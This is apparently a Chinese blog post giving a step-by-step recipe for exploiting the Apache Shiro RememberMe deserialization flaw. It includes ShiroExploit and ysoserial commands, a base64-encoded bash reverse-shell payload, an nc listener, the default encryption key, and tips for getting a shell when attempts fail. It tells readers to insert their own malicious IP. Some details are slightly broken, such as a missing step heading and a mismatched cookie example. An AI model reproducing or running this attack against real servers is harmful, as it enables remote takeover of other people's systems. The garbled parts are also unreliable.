shiro攻防利用

一. 工具准备

  • 核心工具:ShiroExploit(最常用,自动检测密钥、生成Payload)、ysoserial(生成恶意序列化对象);

  • 辅助工具:Burp Suite(抓取Cookie、修改Cookie发送请求)、nc(监听反弹Shell)、Base64编码工具;

  • 前提条件:目标使用受影响的Shiro版本(≤1.2.4)或未修改默认密钥;目标开启RememberMe功能;目标可出网(反弹Shell场景);目标项目依赖CommonsCollections等可利用组件。

二. 完整利用步骤

步骤1:检测目标是否存在Shiro漏洞(密钥探测)

方法1:使用ShiroExploit工具自动探测

bash 复制代码
# 运行ShiroExploit工具(Java版) java -jar ShiroExploit-2.5.jar -u http://目标IP:端口 # 自动探测目标是否存在Shiro漏洞,检测默认密钥

方法2:手动探测(Burp Suite)

  1. 访问目标登录页面,勾选「记住我」,输入正确账号密码登录,抓取返回的RememberMe Cookie;

  2. 将Cookie值Base64解码,若解码后能看到明显的序列化特征(如aced0005开头),说明目标开启Shiro RememberMe功能;

  3. 使用已知默认密钥,对任意内容加密、Base64编码,替换RememberMe Cookie,若返回500错误或异常日志,说明密钥正确,存在漏洞。

步骤2:生成恶意序列化Payload(ysoserial)

使用ysoserial生成包含反弹Shell命令的恶意序列化对象,命令如下:

bash 复制代码
# 生成CommonsCollections3类型的恶意序列化对象,反弹Shell(替换为你的恶意IP和监听端口) java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtYyAnY2hpbGRyZW4gMTI3LjAuMC4xIDIwMDAwIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzIwMDAwICYm} | {base64,-d} | {bash,-i}" > payload.ser

说明:CommonsCollections3是最常用的利用链,需目标项目依赖该组件;若目标无此依赖,可尝试CommonsCollections4、JRMP等其他利用链。

使用已知的Shiro密钥(如默认密钥kPH+bIxk5D2deZiIxcaaaA==),对恶意序列化对象进行AES加密、Base64编码,生成伪造的RememberMe Cookie:

  • 工具生成:ShiroExploit工具可直接输入密钥、反弹命令,自动生成伪造Cookie,无需手动加密;

  • 手动加密(简化):AES加密(ECB模式、PKCS5Padding填充)→ Base64编码,最终得到的字符串即为RememberMe Cookie值。

步骤4:监听反弹Shell,发送恶意请求

在恶意服务器上,用nc监听指定端口(与反弹Shell命令一致):

bash 复制代码
nc -lvp 20000 # 监听20000端口,接收反弹Shell

用Burp Suite抓取目标任意请求(如访问首页),修改请求头中的RememberMe Cookie为伪造的值:

bash 复制代码
Cookie: rememberMe=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...(伪造的Cookie值)

发送请求,服务端会解密、反序列化伪造的Cookie,触发恶意代码执行,nc端即可收到反弹的Shell,获得目标服务器控制权。

三. 常见利用问题

  • 问题1:密钥正确,但无法反弹Shell → 解决:更换ysoserial利用链(如CommonsCollections4),检查目标是否依赖对应组件,检查目标服务器是否可出网;

  • 问题2:返回500错误,但无Shell → 解决:检查恶意命令是否正确,是否适配目标服务器系统(Windows用calc.exe测试,Linux用bash命令);

  • 问题3:工具检测不到漏洞 → 解决:手动探测密钥,检查目标是否开启RememberMe功能,是否修改了默认密钥。

相关推荐
能年玲奈喝榴莲牛奶2 分钟前
OfficeWeb365 SaveDraw 任意文件上传漏洞
安全·web安全·渗透测试·漏洞复现
Deepoch4 分钟前
Deepoc 具身模型开发板赋能智能轮椅自主随行与安全控制技术研究
人工智能·科技·安全·开发板·deepoc·智能轮椅
zhougl9967 分钟前
Redis 防止丢数据
java·redis·mybatis
烟话611 分钟前
C# 内存机制详解:值类型、引用类型与 String 的不可变性
java·jvm·c#
小白电脑技术11 分钟前
OpenClaw的API密钥存在电脑里,远程调用安全吗?
安全·电脑·openclaw
Javatutouhouduan18 分钟前
深入学习JVM底层原理:JVM源码剖析与实例详解
java·jvm·java虚拟机·java面试·后端开发·java程序员·java性能优化
小同志0020 分钟前
⽅法注解 @Bean
java·spring·bean·maven
KivenMitnick20 分钟前
CialloVOL 1.2:便捷好用的轻量化内存取证分析平台
windows·python·安全·网络安全·flask·系统安全·安全威胁分析
Ting.~23 分钟前
GIT详解
java·笔记·git
他是龙55124 分钟前
70:Python安全 & SSTI模板注入 & Jinja2引擎 & 利用绕过 & 工具实战
开发语言·python·安全